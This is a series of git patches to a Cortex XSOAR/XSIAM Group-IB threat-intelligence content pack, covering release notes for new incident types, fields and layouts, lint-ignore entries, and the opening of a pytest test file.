+ +- New: Added a new incident field- GIB Target IP that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Expertises + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Expertises that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Scanner Categories + +- New: Added a new incident field- GIB Scanner Categories that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Description + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Country Name + +- New: Added a new incident field- GIB Country Name that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Leaked File Name + +- Updated the GIB Leaked File Name incident field to support new collections. +##### New: GIB DDOS Request Headers Hash + +- New: Added a new incident field- GIB DDOS Request Headers Hash that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Threat Level + +- New: Added a new incident field- GIB Threat Level that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Date Blocked + +- Updated the GIB Phishing Date Blocked incident field to support new collections. +##### New: GIB Vulnerability Type + +- New: Added a new incident field- GIB Vulnerability Type that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB VPN Sources + +- New: Added a new incident field- GIB VPN Sources that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). #### Incident Types -- New: **GIB Attacks DDOS** -- New: **GIB Compromised Account Group** -- New: **GIB Attacks Deface** -- **GIB OSI Git Leak** -- **GIB Compromised Account** -- **GIB Brand Protection Phishing Kit** -- **GIB Brand Protection Phishing** -- New: **GIB Nation-State Cybercriminals Threat Actor** -- New: **GIB Malware** -- New: **GIB Suspicious IP Open Proxy** -- **GIB Targeted Malware** -- New: **GIB Attacks Phishing Kit** -- New: **GIB Cybercriminal Threat** -- New: **GIB Suspicious IP Socks Proxy** -- New: **GIB Cybercriminal Threat Actor** -- New: **GIB APT Threat** -- New: **GIB Nation-State Cybercriminals Threat** -- New: **GIB Suspicious IP Scanner** -- New: **GIB Suspicious IP VPN** -- New: **GIB Suspicious IP TOR Node** -- New: **GIB Attacks Phishing Group** -- New: **GIB Compromised Card Group** -- **GIB Compromised Card** -- New: **GIB OSI Vulnerability** -- **GIB OSI Public Leak** -- **GIB Data Breach** -- New: **GIB Compromised Mule** -- New: **GIB Malware CNC** +##### New: GIB Cybercriminal Threat Actor + +- New: Added a new incident type- GIB Cybercriminal Threat Actor that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Attacks Phishing Kit + +- New: Added a new incident type- GIB Attacks Phishing Kit that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware + +- New: Added a new incident type- GIB Malware that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat + +- New: Added a new incident type- GIB Nation-State Cybercriminals Threat that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Account Group + +- New: Added a new incident type- GIB Compromised Account Group that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Card + +- Updated the GIB Compromised Card incident type to support new collections. +##### New: GIB Compromised Mule + +- New: Added a new incident type- GIB Compromised Mule that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP TOR Node + +- New: Added a new incident type- GIB Suspicious IP TOR Node that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Actor + +- New: Added a new incident type- GIB Nation-State Cybercriminals Threat Actor that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Socks Proxy + +- New: Added a new incident type- GIB Suspicious IP Socks Proxy that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Targeted Malware + +- Updated the GIB Targeted Malware incident type to support new collections. +##### GIB Brand Protection Phishing + +- Updated the GIB Brand Protection Phishing incident type to support new collections. +##### GIB Compromised Account + +- Updated the GIB Compromised Account incident type to support new collections. +##### New: GIB Malware CNC + +- New: Added a new incident type- GIB Malware CNC that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Attacks DDOS + +- New: Added a new incident type- GIB Attacks DDOS that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Scanner + +- New: Added a new incident type- GIB Suspicious IP Scanner that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Card Group + +- New: Added a new incident type- GIB Compromised Card Group that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Open Proxy + +- New: Added a new incident type- GIB Suspicious IP Open Proxy that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP VPN + +- New: Added a new incident type- GIB Suspicious IP VPN that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB APT Threat + +- New: Added a new incident type- GIB APT Threat that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat + +- New: Added a new incident type- GIB Cybercriminal Threat that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Attacks Phishing Group + +- New: Added a new incident type- GIB Attacks Phishing Group that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB OSI Git Leak + +- Updated the GIB OSI Git Leak incident type to support new collections. +##### GIB Brand Protection Phishing Kit + +- Updated the GIB Brand Protection Phishing Kit incident type to support new collections. +##### GIB Data Breach + +- Updated the GIB Data Breach incident type to support new collections. +##### GIB OSI Public Leak + +- Updated the GIB OSI Public Leak incident type to support new collections. +##### New: GIB OSI Vulnerability + +- New: Added a new incident type- GIB OSI Vulnerability that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Attacks Deface + +- New: Added a new incident type- GIB Attacks Deface that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). #### Indicator Fields -- **GIB ID** -- **GIB Threat Actor Name** -- **GIB Malware Name** -- **GIB Reliability** -- **GIB Collection** -- **GIB Threat Actor ID** -- **GIB Severity** -- **GIB Threat Actor is APT** -- **GIB Proxy Anonymous** -- New: **GIB Hash** -- **GIB Credibility** -- **GIB Admiralty Code** +##### New: GIB Hash + +- New: Added a new indicator field- GIB Hash that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Threat Actor is APT + +- Updated the GIB Threat Actor is APT indicator field to support new collections. +##### GIB Admiralty Code + +- Updated the GIB Admiralty Code indicator field to support new collections. +##### GIB Proxy Anonymous + +- Updated the GIB Proxy Anonymous indicator field to support new collections. +##### GIB Threat Actor Name + +- Updated the GIB Threat Actor Name indicator field to support new collections. +##### GIB Collection + +- Updated the GIB Collection indicator field to support new collections. +##### GIB Severity + +- Updated the GIB Severity indicator field to support new collections. +##### GIB Reliability + +- Updated the GIB Reliability indicator field to support new collections. +##### GIB ID + +- Updated the GIB ID indicator field to support new collections. +##### GIB Credibility + +- Updated the GIB Credibility indicator field to support new collections. +##### GIB Threat Actor ID + +- Updated the GIB Threat Actor ID indicator field to support new collections. +##### GIB Malware Name + +- Updated the GIB Malware Name indicator field to support new collections. #### Indicator Types -- **GIB Victim IP** -- **GIB Compromised IMEI** -- **GIB Compromised Mule** +##### GIB Compromised Mule + +- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections. +##### GIB Victim IP + +- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections. +##### GIB Compromised IMEI + +- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections. #### Integrations ##### Group-IB Threat Intelligence -- Completely updated the code, the main work with API is rewritten to use the library +- Added support for **Hunting Rules** parameter that to enable the collection of data using hunting rules, please select this parameter. +- Deleted the **gibtia-get-malware-targeted-malware-info** command. +- Deleted the **gibtia-get-compromised-card-info** command. +- Deleted the **gibtia-get-phishing-kit-info** command. +- Deleted the **gibtia-get-phishing-info** command. +- Deleted the **gibtia-get-compromised-imei-info** command. +- Added support for **gibtia-get-suspicious-ip-vpn-info** command that command performs group ib event lookup in suspicious_ip/vpn collection by provided id. +- Added support for **gibtia-get-suspicious-ip-scanner-info** command that command performs group ib event lookup in suspicious_ip/scanner collection by provided id. +- Added support for **gibtia-get-phishing-group-info** command that command performs group ib event lookup in attacks/phishing_group collection by provided id. +- Added support for **gibtia-get-compromised-card-group-info** command that command performs group ib event lookup in compromised/bank_card_group collection by provided id. +- Added support for **gibtia-get-malware-malware-info** command that command performs group ib event lookup in malware/malware collection by provided id. - Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*. + ##### Group-IB Threat Intelligence Feed -- Completely updated the code, the main work with API is rewritten to use the library +- Updated the Group-IB Threat Intelligence & Attribution Feed integration to support new collections. - Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*. + #### Layouts -##### GIB OSI Public Leak Layout +##### GIB Compromised IMEI Layout -- New layouts for new collections have been added, as well as old layouts have been modified +- Updated the GIB Compromised IMEI Layout layout to support new collections. +##### New: GIB Cybercriminal Threat Layout -##### New: GIB Suspicious IP Open Proxy Layout +- New: Added a new layout- GIB Cybercriminal Threat Layout that Layout for GIB Cybercriminal Threat +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Card Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Brand Protection Phishing Kit Layout +- Updated the GIB Compromised Card Layout layout to support new collections. +##### New: GIB Cybercriminal Threat Actor Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### GIB Victim IP Layout +- New: Added a new layout- GIB Cybercriminal Threat Actor Layout that Layout for GIB Cybercriminal Threat Actor +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP VPN Layout -- New layouts for new collections have been added, as well as old layouts have been modified +- New: Added a new layout- GIB Suspicious IP VPN Layout that Layout for GIB Suspicious IP VPN +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). ##### New: GIB Attacks Phishing Group Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Nation-State Cybercriminals Threat Layout - -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Compromised Mule Layout +- New: Added a new layout- GIB Attacks Phishing Group Layout that Layout for GIB Attacks Phishing Group +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Attacks Deface Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### GIB Compromised Account Layout +- New: Added a new layout- GIB Attacks Deface Layout that Layout for GIB Attacks Deface +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Attacks Phishing Kit Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Attacks DDOS Layout +- New: Added a new layout- GIB Attacks Phishing Kit Layout that Layout for GIB Attacks Phishing Kit +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Brand Protection Phishing Kit Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Targeted Malware Layout +- Updated the GIB Brand Protection Phishing Kit Layout layout to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Attacks Phishing Kit Layout +- New: Added a new layout- GIB Nation-State Cybercriminals Threat Actor Layout that Layout for Nation-State Cybercriminals Threat Actor +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Data Breach Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Suspicious IP Socks Proxy Layout +- Updated the GIB Data Breach Layout layout to support new collections. +##### New: GIB OSI Vulnerability Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +- New: Added a new layout- GIB OSI Vulnerability Layout that Layout for GIB OSI Vulnerability +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). ##### New: GIB Compromised Card Group Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Cybercriminal Threat Actor Layout +- New: Added a new layout- GIB Compromised Card Group Layout that Layout for GIB Compromised Card Group +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB OSI Git Leak Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Compromised Account Group Layout +- Updated the GIB OSI Git Leak Layout layout to support new collections. +##### New: GIB Attacks DDOS Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Data Breach Layout +- New: Added a new layout- GIB Attacks DDOS Layout that Layout for GIB Attacks DDOS +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### GIB OSI Git Leak Layout +- New: Added a new layout- GIB Malware Layout that Layout for GIB Malware +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB OSI Public Leak Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Malware CNC Layout +- Updated the GIB OSI Public Leak Layout layout to support new collections. +##### New: GIB Suspicious IP Scanner Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Cybercriminal Threat Layout +- New: Added a new layout- GIB Suspicious IP Scanner Layout that Layout for GIB Suspicious IP Scanner +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Targeted Malware Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Compromised Card Layout +- Updated the GIB Targeted Malware Layout layout to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Attacks Deface Layout +- New: Added a new layout- GIB Nation-State Cybercriminals Threat Layout that Layout for Nation-State Cybercriminals Threat +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Account Group Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Nation-State Cybercriminals Threat Actor Layout +- New: Added a new layout- GIB Compromised Account Group Layout that Layout for GIB Compromised Account Group +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB APT Threat Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Malware Layout +- New: Added a new layout- GIB APT Threat Layout that Layout for GIB APT Threat +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware CNC Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB OSI Vulnerability Layout +- New: Added a new layout- GIB Malware CNC Layout that Layout for GIB Malware CNC +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP TOR Node Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Compromised IMEI Layout +- New: Added a new layout- GIB Suspicious IP TOR Node Layout that Layout for GIB Suspicious IP TOR Node +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Victim IP Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Suspicious IP VPN Layout +- Updated the GIB Victim IP Layout layout to support new collections. +##### New: GIB Suspicious IP Socks Proxy Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### GIB Brand Protection Phishing Layout +- New: Added a new layout- GIB Suspicious IP Socks Proxy Layout that Layout for GIB Suspicious IP Socks Proxy +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Open Proxy Layout -- New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Suspicious IP TOR Node Layout +- New: Added a new layout- GIB Suspicious IP Open Proxy Layout that Layout for GIB Suspicious IP Open Proxy +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Brand Protection Phishing Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB APT Threat Layout +- Updated the GIB Brand Protection Phishing Layout layout to support new collections. +##### GIB Compromised Mule Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). -##### New: GIB Suspicious IP Scanner Layout +- Updated the GIB Compromised Mule Layout layout to support new collections. +##### GIB Compromised Account Layout -- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +- Updated the GIB Compromised Account Layout layout to support new collections. #### Mappers ##### Group-IB Threat Intelligence (mapper) -- Added and modified to support new collections +- Updated the Group-IB Threat Intelligence (mapper) mapper to support new collections. #### Playbooks ##### Incident Postprocessing - Group-IB Threat Intelligence & Attribution -- Added and modified post-processing for new collections +- Updated the Incident Postprocessing - Group-IB Threat Intelligence & Attribution playbook to support new collections. + +#### PreProcess Rules + +##### New: gib_rule + +- New: Added a new preprocess rule- gib_rule that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). #### Scripts -##### GIBIncidentUpdate +##### GIBIncidentUpdateIncludingClosed -- Added and modified to support new collections +- Updated the GIBIncidentUpdateIncludingClosed script to support new collections. - Updated the Docker image to: *demisto/python3:3.12.8.1983910*. -##### GIBIncidentUpdateIncludingClosed -- Added and modified to support new collections +##### GIBIncidentUpdate + +- Updated the GIBIncidentUpdate script to support new collections. - Updated the Docker image to: *demisto/python3:3.12.8.1983910*. + From bd9ae88226ea81d077768d1776a51f1f48b5cc2d Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 13:19:48 +0200 Subject: [PATCH 6/9] Various fixes --- .../.pack-ignore | 51 ++++++++++++++++++- .../ReleaseNotes/2_0_0.md | 24 +++++++-- 2 files changed, 71 insertions(+), 4 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 84d337d0295e..14fd5c27d2dc 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -1,4 +1,4 @@ -[file:GroupIB_TIA.yml] +[file:GroupIBTIA.yml] ignore=BA108,BA109,BC104,BC102,ST111,RM110 [file:GroupIB_TIA_Feed.yml] @@ -127,6 +127,9 @@ ignore=IF115 [file:incidentfield-GIB_Emails.json] ignore=IF115 +[file:incidentfield-GIB_Email.json] +ignore=GR103 + [file:incidentfield-GIB_Phishing_Domain_Expiration_Date.json] ignore=IF115 @@ -274,6 +277,49 @@ ignore=IF115 [file:incidentfield-GIB_Date_Updated_At.json] ignore=GR103 +[file:incidentfield-GIB_Date_Expired.json] +ignore=GR103 + +[file:incidentfield-GIB_Phishing_Status.json] +ignore=GR103 + + +[file:incidentfield-GIB_Screenshot.json] +ignore=GR103 + +[file:incidentfield-GIB_ID.json] +ignore=GR103 + +[file:incidentfield-GIB_Person.json] +ignore=GR103 + +[file:incidentfield-GIB_Name_Servers.json] +ignore=GR103 + +[file:incidentfield-GIB_HTML.json] +ignore=GR103 + +[file:incidentfield-GIB_Title.json] +ignore=GR103 + +[file:incidentfield-GIB_Date_Created.json] +ignore=GR103 + +[file:incidentfield-GIB_Favicon.json] +ignore=GR103 + +[file:incidentfield-GIB_Address.json] +ignore=GR103 + +[file:incidentfield-GIB_Phishing_Type.json] +ignore=GR103 + +[file:incidentfield-GIB_Phishing_Domain.json] +ignore=GR103 + +[file:incidentfield-GIB_Related_Indicators_Data.json] +ignore=GR103 + [file:incidentfield-GIB_Scanner_Sources.json] ignore=BA116 @@ -352,3 +398,6 @@ ignore=LO107 [file:layoutscontainer-GIB_Attacks_DDOS_Layout.json] ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Account_Group_Layout.json] +ignore=LO107 diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index c8226c264d61..d4e40df691e5 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md @@ -974,6 +974,24 @@ <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Date Updated + +- New: Added a new incident field- GIB Phishing Date Updated that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +- +- ##### New: GIB Nation-State Cybercriminals Threat Actor Aliases + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Aliases that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +- +- ##### New: GIB Scanner Sources + +- New: Added a new incident field- GIB Scanner Sources that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). + #### Incident Types ##### New: GIB Cybercriminal Threat Actor @@ -1146,13 +1164,13 @@ ##### GIB Compromised Mule -- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections. +- Updated the GIB Compromised Mule indicator type to support new collections. ##### GIB Victim IP -- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections. +- Updated the GIB Victim IP indicator type to support new collections. ##### GIB Compromised IMEI -- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections. +- Updated the GIB Compromised IMEI. indicator type to support new collections. #### Integrations From 358e62ce046df61e9c3d756259bc947f9cb4d6b5 Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 13:59:30 +0200 Subject: [PATCH 7/9] Various fixes --- .../.pack-ignore | 60 ++++++++++++++++ .../incidentfield-CPE_Table.json | 33 --------- .../GroupIBTIA/GroupIBTIA_test.py | 69 ++++++++++++++++++- .../ReleaseNotes/2_0_0.md | 12 ++-- 4 files changed, 134 insertions(+), 40 deletions(-) delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 14fd5c27d2dc..a00ee9ea7a07 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -274,6 +274,66 @@ ignore=IF115 [file:incidentfield-GIB_Downloaded_From_Table.json] ignore=IF115 +[file:incidentfield-GIB_Target_IP.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Regions.json] +ignore=IF115 + +[file:incidentfield-GIB_Threat_Actor_Country.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Short_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_Target_City.json] +ignore=IF115 + +[file:incidentfield-GIB_Socks_Proxy_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Date_Updated.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json] +ignore=IF115 + +[file:incidentfield-GIB_GIT_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Category.json] +ignore=IF115 + +[file:incidentfield-GIB_Bulletin_Family.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Impact.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_ASN.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_Mirror_Link.json] +ignore=IF115 + +[file:incidentfield-GIB_Vulnerability_Type.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Kit_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Country_Code.json] +ignore=IF115 + [file:incidentfield-GIB_Date_Updated_At.json] ignore=GR103 diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json deleted file mode 100644 index d5f44228f276..000000000000 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json +++ /dev/null @@ -1,33 +0,0 @@ -{ - "associatedToAll": false, - "associatedTypes": [ - "GIB OSI Vulnerability" - ], - "caseInsensitive": true, - "cliName": "cpetable", - "closeForm": true, - "content": true, - "editForm": true, - "group": 0, - "hidden": false, - "id": "incident_cpetable", - "isReadOnly": false, - "locked": false, - "name": "CPE Table", - "neverSetAsRequired": false, - "openEnded": false, - "ownerOnly": false, - "required": false, - "sla": 0, - "system": false, - "systemAssociatedTypes": [ - "GIB OSI Vulnerability" - ], - "threshold": 72, - "type": "markdown", - "unmapped": false, - "unsearchable": true, - "useAsKpi": false, - "version": -1, - "fromVersion": "6.10.0" -} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py index e40dad6752f3..437062fe3b5a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py @@ -1,9 +1,14 @@ +from unittest.mock import patch, MagicMock + import pytest + +from CommonServerPython import CommandResults from GroupIBTIA import ( fetch_incidents_command, Client, main, get_available_collections_command, + local_search_command ) from urllib3.exceptions import InsecureRequestWarning from urllib3 import disable_warnings as urllib3_disable_warnings @@ -25,7 +30,6 @@ # Disable insecure warnings urllib3_disable_warnings(InsecureRequestWarning) - COLLECTION_NAMES = [ "compromised/account_group", "compromised/bank_card_group", @@ -202,3 +206,66 @@ def test_get_available_collections(mocker, single_session_fixture): assert result.outputs_prefix == "GIBTIA.OtherInfo" assert result.outputs_key_field == "collections" assert isinstance(result.outputs["collections"], list) + + +@pytest.fixture +def mock_client(): + """Fixture to create a mock client.""" + client = MagicMock() + 